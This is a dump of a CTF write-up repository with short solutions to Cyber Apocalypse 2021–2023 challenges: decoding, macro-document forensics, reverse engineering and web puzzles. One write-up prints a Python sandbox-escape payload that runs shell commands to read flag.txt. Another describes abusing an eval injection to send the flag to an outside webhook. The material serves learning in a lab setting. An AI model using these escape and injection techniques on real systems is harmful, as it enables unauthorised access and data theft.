├── README.md
├── cyber_apocalypse_2021
├── README.md
├── crypto.md
├── crypto
│ ├── NintendoBase64.md
│ ├── PhaseStream1.md
│ └── SoulCrabber1.md
├── forensics.md
├── forensics
│ ├── AlienPhish.md
│ ├── Invitation.md
│ └── Oldesttrickinthebook.md
├── hardware.md
├── hardware
│ ├── Compromised.md
│ └── SerialLogs.md
├── index.html
├── misc.md
├── misc
│ ├── AlienCamp.md
│ ├── Inputasaservice.md
│ └── RoboticInfiltration.md
├── re.md
├── re
│ ├── Authenticator.md
│ └── Passphrase.md
├── robotic.gif
├── web.md
└── web
│ ├── Cass.md
│ ├── DAAS.md
│ ├── Inspectorgadget.md
│ ├── MiniSTRyplace.md
│ └── WildGooseHunt.md
├── cyber_apocalypse_2022
├── README.md
├── forensics.md
├── forensics
│ ├── Automation.md
│ ├── FreeServices.md
│ ├── GoldenPersistence.md
│ ├── IntergalacticRecovery.md
│ └── Puppeteer.md
├── index.html
├── pwn.md
├── pwn
│ └── SpacePirateGoingDeeper.md
├── re.md
├── re
│ ├── OmegaOne.md
│ └── WIDE.md
├── web.md
└── web
│ ├── AmidstUs.md
│ ├── Blinkerfluid.md
│ └── KrpytosSupport.md
├── cyber_apocalypse_2023
├── README.md
├── blockchain.md
├── blockchain
│ ├── Navigatingtheunknown.md
│ └── Shooting101.md
├── crypto.md
├── crypto
│ ├── AncientEncodings.md
│ ├── PerfectSynchronization.md
│ └── SmallStEps.md
├── forensics.md
├── forensics
│ ├── Aliencradle.md
│ ├── Artifactsofdisastroussightings.md
│ ├── Extraterrestrialpersistence.md
│ ├── InterstellarC2.md
│ ├── Packetcyclone.md
│ ├── PlaintextTleasure.md
│ ├── RelicMaps.md
│ └── Roten.md
├── hardware.md
├── hardware
│ ├── CriticalFlight.md
│ └── TimedTransmission.md
├── index.html
├── misc.md
├── misc
│ ├── Hijack.md
│ ├── Persistence.md
│ ├── RemoteComputation.md
│ └── Restricted.md
├── ml.md
├── ml
│ └── Reconfiguration.md
├── pwn.md
├── pwn
│ ├── GettingStarted.md
│ ├── InitialiseConnection.md
│ └── Questionnaire.md
├── re.md
├── re
│ ├── HuntingLicense.md
│ ├── NeedleinaHaystack.md
│ ├── ShatteredTablet.md
│ └── SheShellsCShells.md
├── web.md
└── web
│ ├── Drobots.md
│ ├── Gunhead.md
│ ├── Orbital.md
│ ├── Passman.md
│ └── TrappedSource.md
├── cyber_apocalypse_2024
├── README.md
├── crypto.md
├── crypto
│ ├── Dynastic.md
│ ├── Makeshift.md
│ └── PrimaryKnowledge.md
├── forensics.md
├── forensics
│ ├── AnUnusualsighting.md
│ ├── Confinement.md
│ ├── DataSiege.md
│ ├── FakeBoost.md
│ ├── GameInvitation.md
│ ├── ItHasBegun.md
│ ├── ObliqueFinal.md
│ ├── Phreaky.md
│ ├── Pursuethetracks.md
│ └── Urgent.md
├── hardware.md
├── hardware
│ ├── BunnyPass.md
│ └── Maze.md
├── index.html
├── misc.md
├── misc
│ ├── Character.md
│ ├── StopDropandRoll.md
│ └── Unbreakable.md
├── re.md
├── re
│ ├── Boxcutter.md
│ ├── LootStash.md
│ └── Packed.md
├── web.md
└── web
│ ├── FlagCommand.md
│ ├── KORPTerminal.md
│ ├── LabyrinthLinguist.md
│ ├── LockTalk.md
│ └── TimeKORP.md
├── cyber_apocalypse_2025
├── README.md
├── ai.md
├── ai
│ ├── CursedGateKeeper.md
│ ├── ElixirEmporium.md
│ ├── Embassy.md
│ ├── LunarOrb.md
│ └── MirrorWitch.md
├── blockchain.md
├── blockchain
│ ├── EldoriaGate.md
│ ├── Eldorion.md
│ └── HeliosDEX.md
├── coding.md
├── coding
│ ├── DragonFlight.md
│ ├── DragonFury.md
│ ├── EnchantedCipher.md
│ ├── SummonersIncantation.md
│ └── TheClockworkGuardian.md
├── crypto.md
├── crypto
│ ├── Hourcle.md
│ ├── Kewiri.md
│ └── Traces.md
├── forensics.md
├── forensics
│ ├── AnewHire.md
│ ├── CaveExpedition.md
│ ├── SilentTrap.md
│ ├── StealthInvasion.md
│ ├── TalesfortheBrave.md
│ ├── ThorinsAmulet.md
│ └── ToolPie.md
├── index.html
├── ml.md
├── ml
│ └── EnchantedWeights.md
├── osint.md
├── osint
│ ├── EchoesInStone.md
│ ├── HillsideHaven.md
│ ├── TheAncientCitadel.md
│ ├── TheMechanicalBirdsNest.md
│ ├── ThePoisonedScroll.md
│ ├── TheShadowedSigil.md
│ └── TheStoneThatWhispers.md
├── re.md
├── re
│ ├── EncryptedScroll.md
│ ├── ImpossiMaze.md
│ └── SealedRunes.md
├── web.md
└── web
│ ├── TrialbyFire.md
│ └── WhispersoftheMoonbeam.md
├── gpnctf_2024
├── crypto.md
├── crypto
│ └── nevergonnaletyoucrypto.md
├── index.html
├── pwn.md
├── pwn
│ └── NevergonnagiveyouUB.md
├── re.md
├── re
│ └── Nevergonnarunaroundandreverseyou.md
├── web.md
└── web
│ ├── Nevergonnatellalieandtypeyou.md
│ └── todo.md
├── hacktivitycon_2021
├── README.md
├── crypto.md
├── crypto
│ ├── Hexahedron.md
│ ├── N1TP.md
│ └── TRIFORCE.md
├── index.html
├── misc.md
├── misc
│ ├── BadWords.md
│ ├── Shelle.md
│ └── WORDCHURCH.md
├── mobile.md
├── mobile
│ ├── Reactor.md
│ └── Todo.md
├── osint.md
├── osint
│ └── ChallengeJedSheeran.md
├── pwn.md
├── pwn
│ └── ButterOverflow.md
├── scripting.md
├── scripting
│ └── UHAHA.md
├── warmups.md
├── warmups
│ ├── 2EZ.md
│ ├── Bass64.md
│ ├── ODDBALL.md
│ ├── Pimple.md
│ ├── SixFourOverTwo.md
│ ├── TSUNAMI.md
│ └── TargetPractice.md
├── web.md
└── web
│ ├── Confidentiality.md
│ ├── SWAGGY.md
│ └── Titanic.md
├── hsctf_2021
├── README.md
├── algo.md
├── algo
│ └── notreallymath.md
├── crypto.md
├── crypto
│ ├── aptenodytesforsteri.md
│ ├── opisthocomushoazin.md
│ └── queenofthehill.md
├── index.html
├── misc.md
├── misc
│ ├── Geographic1.md
│ ├── Geographic2.md
│ ├── cbrother1.md
│ ├── glasswindows.md
│ ├── palletsofgold.md
│ └── seededrandomizer.md
├── pwn.md
├── pwn
│ └── stonks.md
├── web.md
└── web
│ ├── DigitsofPi1.md
│ ├── NRCnorightclick.md
│ ├── bigblind.md
│ ├── grading.md
│ └── messageboard.md
├── index.html
├── m0lecon_2021
├── README.md
├── index.html
├── web.md
└── web
│ ├── KeyLottery.md
│ ├── LuckyFall.md
│ └── M0leFans.md
├── metasploit_2021
├── 10_of_clubs.md
├── 10_of_clubs
│ └── 10ofclubs.md
├── 2_of_spades.md
├── 2_of_spades
│ └── 2ofspades.md
├── 3_of_hearts.md
├── 3_of_hearts
│ └── 3ofhearts.md
├── 4_of_diamonds.md
├── 4_of_diamonds
│ └── 4ofdiamonds.md
├── 4_of_hearts.md
├── 4_of_hearts
│ └── 4ofhearts.md
├── 5_of_diamonds.md
├── 5_of_diamonds
│ └── 5ofdiamonds.md
├── 9_of_diamonds.md
├── 9_of_diamonds
│ └── 9ofdiamonds.md
├── README.md
├── ace_of_hearts.md
├── ace_of_hearts
│ └── aceofhearts.md
├── index.html
├── jack_of_hearts.md
└── jack_of_hearts
│ └── jackofhearts.md
├── nahamcon_2021
├── README.md
├── android.md
├── android
│ ├── Andra.md
│ └── Resourceful.md
├── crypto.md
├── crypto
│ ├── CarKeys.md
│ ├── DiceRoll.md
│ ├── EAXY.md
│ ├── Treasure.md
│ ├── chickenwings.md
│ ├── esab64.md
│ └── veebee.md
├── forensics.md
├── forensics
│ ├── Henpeck.md
│ ├── Parseltongue.md
│ ├── Typewriter.md
│ └── buzz.md
├── index.html
├── misc.md
├── misc
│ ├── PrisonBreak.md
│ ├── Zenith.md
│ └── eighthcircle.md
├── mission.md
├── mission
│ ├── Bionic.md
│ ├── Gus.md
│ ├── Hydraulic.md
│ ├── Leo.md
│ ├── LyraandOrion.md
│ ├── MeetTheTeam.md
│ ├── RECON.md
│ └── hercules.md
├── osint.md
├── osint
│ ├── GooglePlaySponsor.md
│ ├── INESponsor.md
│ └── intigritiSponsor.md
├── stego.md
├── stego
│ ├── Pollex.md
│ └── Shoelaces.md
├── twc_nahamcon_cert.png
├── web.md
└── web
│ ├── Echo.md
│ └── HomewardBound.md
├── nahamcon_2022
├── README.md
├── crypto.md
├── crypto
│ ├── BABYRSA.md
│ └── UNIMOD.md
├── index.html
├── keeber_security.md
├── keeber_security
│ ├── Keeber1.md
│ ├── Keeber2.md
│ ├── Keeber3.md
│ ├── Keeber4.md
│ ├── Keeber5.md
│ ├── Keeber6.md
│ ├── Keeber7.md
│ └── Keeber8.md
├── misc.md
├── misc
│ ├── Gossip.md
│ ├── SteamLocomotive.md
│ └── Tobeandnottobe.md
├── mobile.md
├── mobile
│ └── Mobilize.md
├── pwn.md
├── pwn
│ └── Babiersteps.md
├── warmups.md
├── warmups
│ ├── Quirky.md
│ ├── crashoverride.md
│ ├── exitvim.md
│ ├── flagcat.md
│ ├── prisoner.md
│ └── wizard.md
├── web.md
└── web
│ ├── EXtravagant.md
│ ├── JurrassicPark.md
│ └── Personnel.md
├── nahamcon_2024
├── README.md
├── crypto.md
├── crypto
│ └── MagicRSA.md
├── forensics.md
├── forensics
│ ├── 1337Malware.md
│ └── Breathofthewild.md
├── index.html
├── misc.md
├── misc
│ └── SecureSurfer.md
├── mobile.md
├── mobile
│ └── KittyKittyBangBang.md
├── re.md
├── re
│ └── RingCycleBasics.md
├── scripting.md
├── scripting
│ ├── Base3200.md
│ └── HashesonHashesonHashes.md
├── warmup.md
├── warmup
│ ├── QRRRRRRRR.md
│ ├── Readtherules.md
│ ├── Thatsnotmybase.md
│ ├── Twine.md
│ ├── Uriel.md
│ ├── copypasta.md
│ └── eicar.md
├── web.md
└── web
│ ├── AllAboutRobots.md
│ ├── HelpfulDesk.md
│ ├── MyShopDisaster.md
│ ├── TheDavinciCode.md
│ ├── TheHackerWebstore.md
│ ├── TheMissionPart1KnockKnock.md
│ ├── ThomasDEVerson.md
│ └── iDoor.md
├── nahamcon_2025
├── README.md
├── TheMission.md
├── TheMission
│ └── TheMission.md
├── crypto.md
├── crypto
│ └── Cryptoclock.md
├── devops.md
├── devops
│ └── TheBestButler.md
├── index.html
├── malware.md
├── malware
│ └── VerificationClarification.md
├── misc.md
├── misc
│ ├── Flagdle.md
│ ├── SSSH.md
│ └── TheMartian.md
├── nahamcon_2025_twc_cert-min.png
├── osint.md
├── osint
│ ├── SendingMixedSignals.md
│ └── TakentoSchool.md
├── warmup.md
├── warmup
│ ├── NahamCommencement2025.md
│ ├── Quartet.md
│ ├── Screenshot.md
│ └── TheOddyssey.md
├── web.md
└── web
│ ├── AdvancedScreening.md
│ ├── InfiniteQueue.md
│ ├── MethodintheMadness.md
│ ├── MyFirstCTF.md
│ ├── MySecondCTF.md
│ ├── MyThirdCTF.md
│ ├── NoSequel.md
│ ├── SNAD.md
│ └── TMCB.md
├── sdctf_2021
├── README.md
├── crypto.md
├── crypto
│ ├── Aprimehashcandidate.md
│ └── Lostintransmission.md
├── index.html
├── misc.md
├── misc
│ ├── AlternativeArithmetic.md
│ ├── AlternativeArithmeticFinalFlag.md
│ └── Noflagforyou.md
├── osint.md
├── osint
│ ├── SpeedStudying.md
│ ├── SpeedStudying2.md
│ ├── Thisflaghasbeenstolen.md
│ ├── hIDeandseek.md
│ └── hIDeandseek2.md
├── pwn.md
├── pwn
│ ├── FlagDropper.md
│ └── printFailed.md
├── re.md
├── re
│ └── Abowlofpythons.md
├── web.md
└── web
│ ├── Apollo1337.md
│ ├── GETSRequest.md
│ └── GitGood.md
├── sdctf_2022
├── README.md
├── crypto.md
├── crypto
│ └── Vinegar.md
├── forensics.md
├── forensics
│ ├── FlagTrafficker.md
│ └── Susanalbumparty.md
├── index.html
├── jail.md
├── jail
│ ├── rbashwarmup.md
│ └── rbashyetanothercalculator.md
├── misc.md
├── misc
│ ├── BishopDuel.md
│ └── Ishiharatest.md
├── osint.md
├── osint
│ ├── GoogleRansom.md
│ ├── MannHunt.md
│ ├── Partoftheship.md
│ ├── PaypalPlayboy.md
│ └── Samuel.md
├── pwn.md
├── pwn
│ └── Horoscope.md
├── web.md
└── web
│ └── Lotsoflogs.md
├── uiuctf_2021
├── README.md
├── crypto.md
├── crypto
│ ├── backtobasics.md
│ └── dhkeintro.md
├── forensics.md
├── forensics
│ ├── tablet1.md
│ └── tablet2.md
├── index.html
├── misc.md
├── misc
│ ├── CEO.md
│ ├── Emote.md
│ └── dootdoot.md
├── osint.md
├── osint
│ ├── ChaplinsPRNightmare1.md
│ ├── ChaplinsPRNightmare2.md
│ ├── ChaplinsPRNightmare3.md
│ ├── ChaplinsPRNightmare4.md
│ ├── ChaplinsPRNightmare5.md
│ ├── ChaplinsPRNightmare6.md
│ ├── ChaplinsPRNightmare7.md
│ ├── ChaplinsPRNightmare8.md
│ └── OSINTTheCreator.md
├── pwn.md
└── pwn
│ └── pwnwarmup.md
└── wpictf_2021
├── README.md
├── forensics.md
├── forensics
├── DFIR.md
└── Holmes.md
├── index.html
├── misc.md
├── misc
├── CastAway.md
└── Pokemon.md
├── pwn.md
├── pwn
└── m4h.md
├── re.md
├── re
└── BabysFirstReversing.md
├── stego.md
├── stego
├── Glute.md
└── Suspicioustraffic.md
├── web.md
└── web
├── wpiadmin.md
├── wpiadmin2.md
└── wpiadmin3.md
/README.md:
--------------------------------------------------------------------------------
1 | # CTF WriteUps by TWC
2 |
3 | * [Nahamcon 2025](nahamcon_2025/README.md)
4 | * [Cyber Apocalypse 2025](cyber_apocalypse_2025/README.md)
5 | * [Cyber Apocalypse 2024](cyber_apocalypse_2024/README.md)
6 | * [Cyber Apocalypse 2023](cyber_apocalypse_2023/README.md)
7 | * [Cyber Apocalypse 2022](cyber_apocalypse_2022/README.md)
8 | * [SDCTF 2022](sdctf_2022/README.md)
9 | * [Nahamcon 2022](nahamcon_2022/README.md)
10 | * [MetaSploit 2021](metasploit_2021/README.md)
11 | * [HacktivityCon 2021](hacktivitycon_2021/README.md)
12 | * [UIUCTF 2021](uiuctf_2021/README.md)
13 | * [HSCTF 2021](hsctf_2021/README.md)
14 | * [M0leCon 2021](m0lecon_2021/README.md)
15 | * [SDCTF 2021](sdctf_2021/README.md)
16 | * [WPICTF 2021](wpictf_2021/README.md)
17 | * [Cyber Apocalypse 2021](cyber_apocalypse_2021/README.md)
18 | * [Nahamcon 2021](nahamcon_2021/README.md)
--------------------------------------------------------------------------------
/cyber_apocalypse_2021/README.md:
--------------------------------------------------------------------------------
1 | # Cyber Apocalypse 2021
2 |
3 | ## WriteUps
4 |
5 | We have added all the challenges we were able to solve, this is not a complete list.
6 |
7 | * [Cryptography](crypto.md)
8 | * [Forensics](forensics.md)
9 | * [Misc](misc.md)
10 | * [Web](web.md)
11 | * [Reverse Engineering](re.md)
12 | * [Hardware](hardware.md)
--------------------------------------------------------------------------------
/cyber_apocalypse_2021/crypto/NintendoBase64.md:
--------------------------------------------------------------------------------
1 | ---
2 | layout: load_md
3 | title: The White Circle | Cyber Apocalypse 2021 | Nintendo Base64 Writeup
4 | desc: Check out our writeup for Nintendo Base64 for Cyber Apocalypse 2021 capture the flag competition.
5 | image: images/twc_og_banner.jpg
6 | ctf: Cyber Apocalypse 2021
7 | parent: cyber_apocalypse_2021
8 | category: crypto
9 | challenge: Nintendo Base64
10 | tags: "crypto, twh"
11 | date: 2021-04-24T00:00:00+00:00
12 | last_modified_at: 2021-04-24T00:00:00+00:00
13 | ---
14 |
15 |
16 |
17 | > Solved by : thewhiteh4t
18 |
19 | Cyberchef recipe :
20 |
21 | ```json
22 | [
23 | { "op": "Find / Replace",
24 | "args": [{ "option": "Regex", "string": " " }, "", true, false, true, false] },
25 | { "op": "Find / Replace",
26 | "args": [{ "option": "Regex", "string": "\\n" }, "", true, false, true, false] },
27 | { "op": "From Base64",
28 | "args": ["A-Za-z0-9+/=", true] },
29 | { "op": "From Base64",
30 | "args": ["A-Za-z0-9+/=", true] },
31 | { "op": "From Base64",
32 | "args": ["A-Za-z0-9+/=", true] },
33 | { "op": "From Base64",
34 | "args": ["A-Za-z0-9+/=", true] },
35 | { "op": "From Base64",
36 | "args": ["A-Za-z0-9+/=", true] },
37 | { "op": "From Base64",
38 | "args": ["A-Za-z0-9+/=", true] },
39 | { "op": "From Base64",
40 | "args": ["A-Za-z0-9+/=", true] },
41 | { "op": "From Base64",
42 | "args": ["A-Za-z0-9+/=", true] }
43 | ]
44 | ```
45 |
46 |
--------------------------------------------------------------------------------
/cyber_apocalypse_2021/forensics/Invitation.md:
--------------------------------------------------------------------------------
1 | ---
2 | layout: load_md
3 | title: The White Circle | Cyber Apocalypse 2021 | Invitation Writeup
4 | desc: Check out our writeup for Invitation for Cyber Apocalypse 2021 capture the flag competition.
5 | image: images/twc_og_banner.jpg
6 | ctf: Cyber Apocalypse 2021
7 | parent: cyber_apocalypse_2021
8 | category: forensics
9 | challenge: Invitation
10 | tags: "forensics, starry, vba"
11 | date: 2021-04-24T00:00:00+00:00
12 | last_modified_at: 2021-04-24T00:00:00+00:00
13 | ---
14 |
15 |
16 |
17 | > Solved By : Starry-Lord
18 |
19 | * So we get a docm file.
20 | * I start by unzippping the word document
21 | * We get a docm
22 | * Unzip it again and see folders
23 |
24 | 
25 |
26 | **PART 1**
27 |
28 | * First thing I tried to do after looking around was
29 |
30 | ```bash
31 | strings vbaProject.bin
32 | ```
33 |
34 | * Which gives back interesting hex lines.
35 |
36 | 
37 |
38 | * Then decrypt from hex
39 |
40 | 
41 |
42 | * From base64 urlsafe alphabet will show the following
43 |
44 | 
45 |
46 | ```
47 | CHTB{maldocs_are
48 | ```
49 |
50 | **PART 2**
51 |
52 | * Upload full vbaProject file this time and do the same as before.
53 |
54 | 
55 |
56 | * Use base64 urlsafe alphabet
57 | * We get second part of the flag by reversing
58 |
59 | ```
60 | _the_new_meta}
61 | ```
62 | ```
63 | CHTB{maldocs_are_the_new_meta}
64 | ```
65 |
66 |
--------------------------------------------------------------------------------
/cyber_apocalypse_2021/hardware/Compromised.md:
--------------------------------------------------------------------------------
1 | ---
2 | layout: load_md
3 | title: The White Circle | Cyber Apocalypse 2021 | Compromised Writeup
4 | desc: Check out our writeup for Compromised for Cyber Apocalypse 2021 capture the flag competition.
5 | image: images/twc_og_banner.jpg
6 | ctf: Cyber Apocalypse 2021
7 | parent: cyber_apocalypse_2021
8 | category: hardware
9 | challenge: Compromised
10 | tags: "hardware, nigamelastic, salea"
11 | date: 2021-04-24T00:00:00+00:00
12 | last_modified_at: 2021-04-24T00:00:00+00:00
13 | ---
14 |
15 |
16 |
17 | > Solved by : Nigamelastic
18 |
19 | * import the file in salea logic analyzer, and use i2c analyzer
20 | * export the data and you will see two columns if we take everything written and try the hex dump we get
21 |
22 | ```
23 | set_maCxH_lTimB{itn_tuo1:110_se73t_2mimn1_nli4mi70t_2to5:_1c0+.]<+/4~nr^_yz82Gb3b"4#kU_..4+J_5.
24 | ```
25 | ```
26 | 3M.2B1.4B.1dV_5. yS.5B7k3..1V.Qxm.!j.@Q52yq)t%# @5%md}S.
27 | ```
28 |
29 | * and we can see its slightly off i noticed the following :
30 |
31 | 
32 |
33 | * so i used only `0x2C` used the corresponding hex
34 |
35 | which is
36 |
37 | ```
38 | 0x43 0x48 0x54 0x42 0x7B 0x6E 0x75 0x31 0x31 0x5F 0x37 0x33 0x32 0x6D 0x31 0x6E 0x34 0x37 0x30 0x32 0x35 0x5F 0x63 0x34 0x6E 0x5F 0x38 0x32 0x33 0x34 0x6B 0x5F 0x34 0x5F 0x35 0x33 0x32 0x31 0x34 0x31 0x5F 0x35 0x79 0x35 0x37 0x33 0x6D 0x21 0x40 0x35 0x32 0x29 0x23 0x40 0x25 0x7D
39 | ```
40 |
41 | * and got the flag
42 |
43 | ```
44 | CHTB{nu11_732m1n47025_c4n_8234k_4_532141_5y573m!@52)#@%}
45 | ```
--------------------------------------------------------------------------------
/cyber_apocalypse_2021/index.html:
--------------------------------------------------------------------------------
1 | ---
2 | layout: ctf_page
3 | title: The White Circle | CTF Writeups | Cyber Apocalypse 2021
4 | desc: "The White Circle is a community for Cyber/Information Security students, enthusiasts and professionals. You can discuss anything related to Security, share your knowledge with others, get help when you need it and proceed further in your journey with amazing people from all over the world."
5 | image: images/twc_og_banner.jpg
6 | ctf: Cyber Apocalypse 2021
7 | ---
--------------------------------------------------------------------------------
/cyber_apocalypse_2021/misc/Inputasaservice.md:
--------------------------------------------------------------------------------
1 | ---
2 | layout: load_md
3 | title: The White Circle | Cyber Apocalypse 2021 | Input as a service Writeup
4 | desc: Check out our writeup for Input as a service for Cyber Apocalypse 2021 capture the flag competition.
5 | image: images/twc_og_banner.jpg
6 | ctf: Cyber Apocalypse 2021
7 | parent: cyber_apocalypse_2021
8 | category: misc
9 | challenge: Input as a service
10 | tags: "misc, ava, python, jail, escape"
11 | date: 2021-04-24T00:00:00+00:00
12 | last_modified_at: 2021-04-24T00:00:00+00:00
13 | ---
14 |
15 |
16 |
17 | > Solved by : ava
18 |
19 | * We are given a py-jail
20 | * https://programmer.help/blogs/python-sandbox-escape.html
21 | * I used this website as reference, `os` and such imports are banned, so we used string manipulation
22 | * we just reverse the string `os` to `so` and import it and then do `ls` command to * * see the `flag.txt` and then just `cat` the flag
23 | * the code to do is given below
24 |
25 | ```bash
26 |
27 | __import__('so'[::-1]).system('ls')
28 |
29 |
30 | flag.txt
31 | input_as_a_service.py
32 |
33 |
34 | __import__('so'[::-1]).system('cat flag.txt')
35 |
36 | CHTB{4li3n5_us3_pyth0n2.X?!}
37 | ```
38 |
39 |
--------------------------------------------------------------------------------
/cyber_apocalypse_2021/re/Passphrase.md:
--------------------------------------------------------------------------------
1 | ---
2 | layout: load_md
3 | title: The White Circle | Cyber Apocalypse 2021 | Passphrase Writeup
4 | desc: Check out our writeup for Passphrase for Cyber Apocalypse 2021 capture the flag competition.
5 | image: images/twc_og_banner.jpg
6 | ctf: Cyber Apocalypse 2021
7 | parent: cyber_apocalypse_2021
8 | category: re
9 | challenge: Passphrase
10 | tags: "re, chronocruz, ida"
11 | date: 2021-04-24T00:00:00+00:00
12 | last_modified_at: 2021-04-24T00:00:00+00:00
13 | ---
14 |
15 |
16 |
17 | > Solved by chronocruz.exe
18 |
19 | Disassembling the binary in IDA we reach the first code block where a certain portion of the code caught my eye
20 |
21 | 
22 |
23 | * So I wrote down the string given here
24 |
25 | ```
26 | 3xtr4t3rR3stR14L5_VS_hum4n5
27 | ```
28 |
29 | * Tried using this string in the program and voila!
30 |
31 | 
--------------------------------------------------------------------------------
/cyber_apocalypse_2021/robotic.gif:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/thewhitecircle/ctf_writeups/28b263d522098954f59d1f075283320cf70d8131/cyber_apocalypse_2021/robotic.gif
--------------------------------------------------------------------------------
/cyber_apocalypse_2021/web/Cass.md:
--------------------------------------------------------------------------------
1 | ---
2 | layout: load_md
3 | title: The White Circle | Cyber Apocalypse 2021 | Cass Writeup
4 | desc: Check out our writeup for Cass for Cyber Apocalypse 2021 capture the flag competition.
5 | image: images/twc_og_banner.jpg
6 | ctf: Cyber Apocalypse 2021
7 | parent: cyber_apocalypse_2021
8 | category: web
9 | challenge: Cass
10 | tags: "web, twh, js"
11 | date: 2021-04-24T00:00:00+00:00
12 | last_modified_at: 2021-04-24T00:00:00+00:00
13 | ---
14 |
15 |
16 |
17 | > Solved by : thewhiteh4t
18 |
19 | * Input sanitization is only in front end via javascript
20 | * we can use burpsuite to bypass that
21 |
22 | 
23 |
24 |
--------------------------------------------------------------------------------
/cyber_apocalypse_2021/web/Inspectorgadget.md:
--------------------------------------------------------------------------------
1 | ---
2 | layout: load_md
3 | title: The White Circle | Cyber Apocalypse 2021 | Inspector gadget Writeup
4 | desc: Check out our writeup for Inspector gadget for Cyber Apocalypse 2021 capture the flag competition.
5 | image: images/twc_og_banner.jpg
6 | ctf: Cyber Apocalypse 2021
7 | parent: cyber_apocalypse_2021
8 | category: web
9 | challenge: Inspector gadget
10 | tags: "web, bobby, ava, js"
11 | date: 2021-04-24T00:00:00+00:00
12 | last_modified_at: 2021-04-24T00:00:00+00:00
13 | ---
14 |
15 |
16 |
17 | > Solved by: Bobby sox and ava
18 |
19 | * Visiting the webpage we see a part of a flag: CHTB{
20 |
21 | * If we keep looking around the pages, we find in /static/js/main another part of the flag:
22 |
23 | ```
24 | us3full_1nf0rm4tion}
25 | ```
26 |
27 | * This in combination with the flag on the website is not the correct flag so far.
28 | * static/css/main.css has another potential hint at the top with: c4n_r3ve4l_
29 | * so, so far we have collected 3 pieces of a flag:
30 |
31 | ```
32 | 1. CHTB{
33 | 2. us3full_1nf0rm4tion}
34 | 3. c4n_r3ve4l_
35 | ```
36 |
37 | * in js.main we will also find the last piece of our flag:1nsp3ction_
38 | * the full flag ended up being :`CHTB{1nsp3ction_c4n_r3ve4l_us3full_1nf0rm4tion}`
39 |
40 |
--------------------------------------------------------------------------------
/cyber_apocalypse_2022/README.md:
--------------------------------------------------------------------------------
1 | # Cyber Apocalypse 2022
2 |
3 | ## WriteUps
4 |
5 | We have added all the challenges we were able to solve, this is not a complete list.
6 |
7 | * [Forensics](forensics.md)
8 | * [Pwn](pwn.md)
9 | * [Web](web.md)
10 | * [Reverse Engineering](re.md)
--------------------------------------------------------------------------------
/cyber_apocalypse_2022/index.html:
--------------------------------------------------------------------------------
1 | ---
2 | layout: ctf_page
3 | title: The White Circle | CTF Writeups | Cyber Apocalypse 2022
4 | desc: "The White Circle is a community for Cyber/Information Security students, enthusiasts and professionals. You can discuss anything related to Security, share your knowledge with others, get help when you need it and proceed further in your journey with amazing people from all over the world."
5 | image: images/twc_og_banner.jpg
6 | ctf: Cyber Apocalypse 2022
7 | ---
--------------------------------------------------------------------------------
/cyber_apocalypse_2022/re/WIDE.md:
--------------------------------------------------------------------------------
1 | ---
2 | layout: load_md
3 | title: The White Circle | Cyber Apocalypse 2022 | WIDE Writeup
4 | desc: Check out our writeup for WIDE for Cyber Apocalypse 2022 capture the flag competition.
5 | image: images/twc_og_banner.jpg
6 | ctf: Cyber Apocalypse 2022
7 | parent: cyber_apocalypse_2022
8 | category: re
9 | challenge: WIDE
10 | tags: "re, ava, ghidra"
11 | date: 2022-05-21T00:00:00+00:00
12 | last_modified_at: 2022-05-21T00:00:00+00:00
13 | ---
14 |
15 |
16 | > Solved by - avantika(iamavu)
17 |
18 | We load the binary in Ghidra, and take a look at functions, the menu function was interesting
19 |
20 | 
21 |
22 | We look at the decompile part, and it shows a string, let’s try to enter this by running the binary
23 |
24 | 
25 |
26 | and we get our flag
27 |
28 | 
29 |
30 | FLAG - `HTB{str1ngs_4r3nt_4lw4ys_4sc11}`
--------------------------------------------------------------------------------
/cyber_apocalypse_2022/web/AmidstUs.md:
--------------------------------------------------------------------------------
1 | ---
2 | layout: load_md
3 | title: The White Circle | Cyber Apocalypse 2022 | Amidst Us Writeup
4 | desc: Check out our writeup for Amidst Us for Cyber Apocalypse 2022 capture the flag competition.
5 | image: images/twc_og_banner.jpg
6 | ctf: Cyber Apocalypse 2022
7 | parent: cyber_apocalypse_2022
8 | category: web
9 | challenge: Amidst Us
10 | tags: "web, twh, starry, taz, ava, legend, ssrf"
11 | date: 2022-05-21T00:00:00+00:00
12 | last_modified_at: 2022-05-21T00:00:00+00:00
13 | ---
14 |
15 |
16 | > Solved by : thewhiteh4t, Starry-Lord, Taz34, Avantika, Legend
17 |
18 | 
19 |
20 | The downloadable files gives us a few clues in the files in requirements.txt and util.py:
21 |
22 | * It’s a python environment
23 | * It uses a vulnerable version of the python Pillow library
24 |
25 | 
26 |
27 | https://github.com/python-pillow/Pillow/pull/5923
28 |
29 | link: [python-pillow/Pillow#5923](https://github.com/python-pillow/Pillow/pull/5923)
30 |
31 | This exchange provided some great insights on how to trigger SSRF
32 |
33 | In util.py we find eval is being used on the data provided in the POST request, which allows us to upload a random image with background rgb parameters.
34 |
35 | After a couple trial and errors we managed to grab the flag.txt and send it to our webhook by replacing one of the RGB values of “background”:
36 |
37 | 
38 |
39 | ```
40 | HTB{i_slept_my_way_to_rce}
41 | ```
42 |
43 |
--------------------------------------------------------------------------------
/cyber_apocalypse_2023/README.md:
--------------------------------------------------------------------------------
1 | # Cyber Apocalypse 2023
2 |
3 | ## WriteUps
4 |
5 | We have added all the challenges we were able to solve, this is not a complete list.
6 |
7 | * [Blockchain](blockchain.md)
8 | * [Crypto](crypto.md)
9 | * [Forensics](forensics.md)
10 | * [Hardware](hardware.md)
11 | * [Machine Learning](ml.md)
12 | * [Misc](misc.md)
13 | * [Pwn](pwn.md)
14 | * [Reverse Engineering](re.md)
15 | * [Web](web.md)
--------------------------------------------------------------------------------
/cyber_apocalypse_2023/forensics/Aliencradle.md:
--------------------------------------------------------------------------------
1 | ---
2 | layout: load_md
3 | title: The White Circle | Cyber Apocalypse 2023 | Alien cradle Writeup
4 | desc: Check out our writeup for Alien cradle for Cyber Apocalypse 2023 capture the flag competition.
5 | image: images/twc_og_banner.jpg
6 | ctf: Cyber Apocalypse 2023
7 | parent: cyber_apocalypse_2023
8 | category: forensics
9 | challenge: Alien cradle
10 | tags: "forensics, twh, powershell"
11 | date: 2023-03-27T00:00:00+00:00
12 | last_modified_at: 2023-03-27T00:00:00+00:00
13 | ---
14 |
15 |
16 |
17 | > Solved by : thewhiteh4t
18 |
19 |
20 | - A powershell script is given
21 | - the flag is present in a variable `f` in concatenated form
22 |
23 |
24 | HTB{p0w3rsh3ll_Cr4dl3s_c4n_g3t_th3_j0b_d0n3}
25 |
26 |
27 |
--------------------------------------------------------------------------------
